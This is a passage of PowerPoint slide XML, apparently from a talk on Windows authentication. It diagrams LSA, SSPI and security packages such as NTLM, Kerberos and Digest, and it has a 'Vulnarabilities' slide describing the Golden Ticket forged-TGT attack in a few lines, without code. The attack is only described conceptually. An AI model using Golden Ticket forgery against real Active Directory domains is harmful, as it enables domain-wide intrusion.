          <a:ln>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr vert="eaVert" wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2916238" y="2637432"/>
            <a:ext cx="5688012" cy="50323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GB">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>SSPI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3203575" y="3645495"/>
            <a:ext cx="576263" cy="136842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eaVert" wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Negotiate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="AutoShape 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3419475" y="3213695"/>
            <a:ext cx="144463" cy="360362"/>
          </a:xfrm>
          <a:prstGeom prst="upDownArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49890"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert" wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Rectangle 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4140200" y="3645495"/>
            <a:ext cx="792163" cy="79216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GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NTLM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Package</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Rectangle 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5003800" y="3645495"/>
            <a:ext cx="792163" cy="10795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GB" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SChannel</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Package</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Rectangle 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5867400" y="3645495"/>
            <a:ext cx="792163" cy="143986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GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Kerberos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Package</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Rectangle 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6732588" y="3645495"/>
            <a:ext cx="792162" cy="180022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GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Digest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Package</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Line 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3779838" y="4005857"/>
            <a:ext cx="3603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74" name="Line 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3779838" y="4869457"/>
            <a:ext cx="2087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75" name="AutoShape 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4427538" y="3213695"/>
            <a:ext cx="144462" cy="360362"/>
          </a:xfrm>
          <a:prstGeom prst="upDownArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49890"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert" wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="AutoShape 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5292725" y="3213695"/>
            <a:ext cx="144463" cy="360362"/>
          </a:xfrm>
          <a:prstGeom prst="upDownArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49890"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert" wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="AutoShape 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6156325" y="3213695"/>
            <a:ext cx="144463" cy="360362"/>
          </a:xfrm>
          <a:prstGeom prst="upDownArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49890"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert" wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="AutoShape 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7019925" y="3213695"/>
            <a:ext cx="144463" cy="360362"/>
          </a:xfrm>
          <a:prstGeom prst="upDownArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49890"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert" wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Line 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4500563" y="4437657"/>
            <a:ext cx="0"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80" name="Line 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5364163" y="4724995"/>
            <a:ext cx="0" cy="8651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81" name="Line 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6227763" y="5085357"/>
            <a:ext cx="0" cy="720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82" name="Line 40"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7164388" y="5445720"/>
            <a:ext cx="0"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83" name="Line 41"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2555875" y="5374282"/>
            <a:ext cx="19446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84" name="Line 42"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2555875" y="5590182"/>
            <a:ext cx="2808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85" name="Line 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2555875" y="5806082"/>
            <a:ext cx="36718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86" name="Line 44"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2555875" y="6021982"/>
            <a:ext cx="46085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87" name="Rectangle 45"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7596188" y="3645495"/>
            <a:ext cx="792162" cy="216058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GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Custom</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Package</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="AutoShape 46"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7883525" y="3213695"/>
            <a:ext cx="144463" cy="360362"/>
          </a:xfrm>
          <a:prstGeom prst="upDownArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49890"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert" wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Line 47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7956550" y="5806082"/>
            <a:ext cx="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90" name="Line 48"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2555875" y="6237882"/>
            <a:ext cx="54006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91" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3915" y="2926357"/>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algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1">
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>LSALogonUser</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0">
              <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="333077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Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vulnarabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 29"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Golden Ticket</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="コンテンツ プレースホルダー 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="648742" y="1463040"/>
            <a:ext cx="7924800" cy="1461939"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A TGT forged without even talking to the KDC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All rules the KDC usually enforces are ignored.]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There is no control over the PAC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7D0E2C5-8FC2-46E5-84FC-736ED0DE8F2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3852936" y="4779408"/>
            <a:ext cx="7235626" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="LID4096" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="237086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dirty="0"/>
              <a:t>Appendix</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Subtitle 1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4080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UI Light" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 29"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Active Directory Configurations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="コンテンツ プレースホルダー 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="648742" y="1463040"/>
            <a:ext cx="7924800" cy="2754600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Account options (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>UserAccountControl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
